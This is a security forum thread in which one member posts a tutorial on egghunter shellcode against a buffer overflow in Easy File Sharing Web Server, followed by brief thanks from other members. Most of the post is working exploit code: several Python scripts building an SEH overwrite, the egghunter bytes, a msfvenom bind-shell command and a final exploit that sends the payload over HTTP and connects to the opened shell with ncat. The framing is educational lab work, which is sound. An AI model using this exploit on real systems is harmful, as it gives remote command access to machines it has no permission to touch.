October 18, 2017, 11:32:09 AM
Welcome, Guest. Please login or register.

THS Promising Student Scholarship has been introduced! Full and partial scholarships available. See http://www.top-hat-sec.com/scholarships.html for more details

Author Topic: Egghunting Sorcery!!  (Read 700 times)

Offline ch3rn0byl

  • Top Hat Member
  • Experienced
  • ********
  • Posts: 187
  • Internets: +1337/-0
  • Grumpy Old Man with Mounds of Salt
Egghunting Sorcery!!
« on: July 28, 2016, 01:58:15 AM »
Videos up! Just head to the link if you would like to watch it :)
Also, you can find this post on my site too: http://ch3rn0byl.com/egghunting-sorcery/Knowing thy Egghunter
What does it exactly do though?
Reconstructing our Exploit

Earlier, I mentioned we were going to be working with the vulnerable software from my last post, which was Easy File Sharing Web Server. Lets pick a part the previous exploit so we can implement our egghunter and you can see it in action.

Code: [Select]
from socket import socket, AF_INET, SOCK_STREAM

host = '192.168.126.142'

crash = "A" * 4061                    <---- Will not change. This is what crashes our app
crash += "\xeb\x06\x90\x90"           <---- Does not change either. This is what jumps to our egghunter
crash += "\xff\x28\x02\x10"           <---- Will not change either. This is our P/P/R
crash += "D" * (5500 - 4061 - 8)      <---- Our junk that we can leave alone as well

payload = 'GET {} HTTP/1.0\r\n\r\n'.format(crash)

try:
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((host, 80))
        print '[+] Sending payload...'
        s.send(payload)
        s.close()
except:
        print '[!] Whoops!! Something went wrong?'
Code: [Select]
from socket import socket, AF_INET, SOCK_STREAM

host = '192.168.126.142'

egghunter = ''
egghunter += '\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c'
egghunter += '\x05\x5a\x74\xef\xb8\x68\x69\x76\x65\x8b\xfa\xaf\x75'
egghunter += '\xea\xaf\x75\xe7\xff\xe7'

crash = "A" * 4061                                     
crash += "\xeb\x06\x90\x90"                           
crash += "\xff\x28\x02\x10"                           
crash += egghunter                                     <---- Our added egghunter of hive
crash += "D" * (5500 - 4061 - 8 - len(egghunter))      <---- Taking accountability of our egghunter

payload = 'GET {} HTTP/1.0\r\n\r\n'.format(crash)

try:
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((host, 80))
        print '[+] Sending payload...'
        s.send(payload)
        s.close()
except:
        print '[!] Whoops!! Something went wrong?'
Code: [Select]
from socket import socket, AF_INET, SOCK_STREAM

host = '192.168.126.142'

egghunter = ''
egghunter += '\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c'
egghunter += '\x05\x5a\x74\xef\xb8\x68\x69\x76\x65\x8b\xfa\xaf\x75'
egghunter += '\xea\xaf\x75\xe7\xff\xe7'

crash = "A" * 4061                                     
crash += "\xeb\x06\x90\x90"                           
crash += "\xff\x28\x02\x10"                           
crash += egghunter                                     
crash += "D" * (5500 - 4061 - 8 - len(egghunter))     

payload = 'GET {} HTTP/1.0\r\n\r\n'.format(crash)
payload += 'hivehive'
payload += 'E' * 800

try:
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((host, 80))
        print '[+] Sending payload...'
        s.send(payload)
        s.close()
except:
        print '[!] Whoops!! Something went wrong?'


Awesome!! Look at that sweet, sweet space to insert any type of payload our little heart desires!

Code: [Select]
dev@ubuntu:~# msfvenom -p windows/shell_bind_tcp LPORT=54321 -n 20 -f python -a x86 --platform windows -b '\x00' -v rekt
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai chosen with final size 355
Successfully added NOP sled from x86/single_byte
Payload size: 375 bytes
rekt =  ""
--snipped--
Code: [Select]
#!/usr/bin/python

from socket import socket, AF_INET, SOCK_STREAM
from sys import argv
from struct import pack
from time import sleep
from subprocess import call

host = argv[1]

rekt =  ""
rekt += "\x93\x93\x48\xf5\x93\x93\x90\xf9\x90\x37\x4a\x48\x90"
rekt += "\x99\x9b\x37\x98\x9f\xfc\xd6\xbd\x71\xab\x9a\xbc\xdb"
rekt += "\xd0\xd9\x74\x24\xf4\x5f\x29\xc9\xb1\x53\x31\x6f\x12"
rekt += "\x83\xef\xfc\x03\x1e\xa5\x78\x49\x1c\x51\xfe\xb2\xdc"
rekt += "\xa2\x9f\x3b\x39\x93\x9f\x58\x4a\x84\x2f\x2a\x1e\x29"
rekt += "\xdb\x7e\x8a\xba\xa9\x56\xbd\x0b\x07\x81\xf0\x8c\x34"
rekt += "\xf1\x93\x0e\x47\x26\x73\x2e\x88\x3b\x72\x77\xf5\xb6"
rekt += "\x26\x20\x71\x64\xd6\x45\xcf\xb5\x5d\x15\xc1\xbd\x82"
rekt += "\xee\xe0\xec\x15\x64\xbb\x2e\x94\xa9\xb7\x66\x8e\xae"
rekt += "\xf2\x31\x25\x04\x88\xc3\xef\x54\x71\x6f\xce\x58\x80"
rekt += "\x71\x17\x5e\x7b\x04\x61\x9c\x06\x1f\xb6\xde\xdc\xaa"
rekt += "\x2c\x78\x96\x0d\x88\x78\x7b\xcb\x5b\x76\x30\x9f\x03"
rekt += "\x9b\xc7\x4c\x38\xa7\x4c\x73\xee\x21\x16\x50\x2a\x69"
rekt += "\xcc\xf9\x6b\xd7\xa3\x06\x6b\xb8\x1c\xa3\xe0\x55\x48"
rekt += "\xde\xab\x31\xbd\xd3\x53\xc2\xa9\x64\x20\xf0\x76\xdf"
rekt += "\xae\xb8\xff\xf9\x29\xbe\xd5\xbe\xa5\x41\xd6\xbe\xec"
rekt += "\x85\x82\xee\x86\x2c\xab\x64\x56\xd0\x7e\x10\x5e\x77"
rekt += "\xd1\x07\xa3\xc7\x81\x87\x0b\xa0\xcb\x07\x74\xd0\xf3"
rekt += "\xcd\x1d\x79\x0e\xee\xf5\x4b\x87\x08\x9f\xbb\xc1\x83"
rekt += "\x37\x7e\x36\x1c\xa0\x81\x1c\x34\x46\xc9\x76\x83\x69"
rekt += "\xca\x5c\xa3\xfd\x41\xb3\x77\x1c\x56\x9e\xdf\x49\xc1"
rekt += "\x54\x8e\x38\x73\x68\x9b\xaa\x10\xfb\x40\x2a\x5e\xe0"
rekt += "\xde\x7d\x37\xd6\x16\xeb\xa5\x41\x81\x09\x34\x17\xea"
rekt += "\x89\xe3\xe4\xf5\x10\x61\x50\xd2\x02\xbf\x59\x5e\x76"
rekt += "\x6f\x0c\x08\x20\xc9\xe6\xfa\x9a\x83\x55\x55\x4a\x55"
rekt += "\x96\x66\x0c\x5a\xf3\x10\xf0\xeb\xaa\x64\x0f\xc3\x3a"
rekt += "\x61\x68\x39\xdb\x8e\xa3\xf9\xeb\xc4\xe9\xa8\x63\x81"
rekt += "\x78\xe9\xe9\x32\x57\x2e\x14\xb1\x5d\xcf\xe3\xa9\x14"
rekt += "\xca\xa8\x6d\xc5\xa6\xa1\x1b\xe9\x15\xc1\x09"

egghunter = ''
egghunter += '\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c'
egghunter += '\x05\x5a\x74\xef\xb8\x68\x69\x76\x65\x8b\xfa\xaf\x75'
egghunter += '\xea\xaf\x75\xe7\xff\xe7'

crash = "A" * 4061
crash += pack('<L', 0x909006eb)
crash += pack('<L', 0x10019ce3)
crash += egghunter
crash += "D" * (5500 - 4061 - 8 - len(egghunter))

payload = 'GET {} HTTP/1.0\r\n\r\n'.format(crash)
payload += 'hivehive'
payload += rekt
payload += 'E' * (800 - len(rekt))

print '[+] Trying to exploit {}...'.format(host)

try:
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((host, 80))
        print '[+] Sending payload...'
        s.send(payload)
        s.close()
        print '[+] Trying to connect to target...\n'
        try:
                sleep(2)
                call(['ncat', host, '54321'])
        except:
                print '[!] Whoops!! Something went wrong?'
except:
        print '[!] Whoops!! Something went wrong?'
finally:
        print '\n[+] I <3 SHELLS'

« Last Edit: July 29, 2016, 06:06:47 PM by ch3rn0byl »
The quieter you become, the more you are unlikely to sound stupid.

Offline H4v0K

  • Administrator
  • Elite
  • *****
  • Posts: 1019
  • Internets: +986/-1
Re: Egghunting Sorcery!!
« Reply #1 on: July 28, 2016, 04:06:35 AM »
video video video video video video :P  . im just gonna have to copy all this ill never remember it till i start doing them .. thanks for posting

Offline Grey-Matter

  • Top Hat Member
  • Experienced
  • ********
  • Posts: 112
  • Internets: +57/-0
Re: Egghunting Sorcery!!
« Reply #2 on: July 28, 2016, 09:11:59 AM »
Exactly what h4v said. Thanx for bringin some more cool shit back for us to learn like always. I'll definitely have to put a day aside to sit down and try to grasp this. I'll post again after i've gone thru it. Keep it up brotha!!!!!!! :)

Offline ch3rn0byl

  • Top Hat Member
  • Experienced
  • ********
  • Posts: 187
  • Internets: +1337/-0
  • Grumpy Old Man with Mounds of Salt
Re: Egghunting Sorcery!!
« Reply #3 on: July 28, 2016, 06:23:28 PM »
The quieter you become, the more you are unlikely to sound stupid.

Offline Malachai

  • Top Hat Member
  • Super Elite
  • ********
  • Posts: 2805
  • Internets: +18/-7
  • #!/bin/sh Day/Night (Grey Hat)
Re: Egghunting Sorcery!!
« Reply #4 on: July 30, 2016, 09:11:25 PM »
That was pretty cool video you made..> Great job
** Dont' judge me! **

*//
  Hope that Firewall works because your SCREWED  
  //*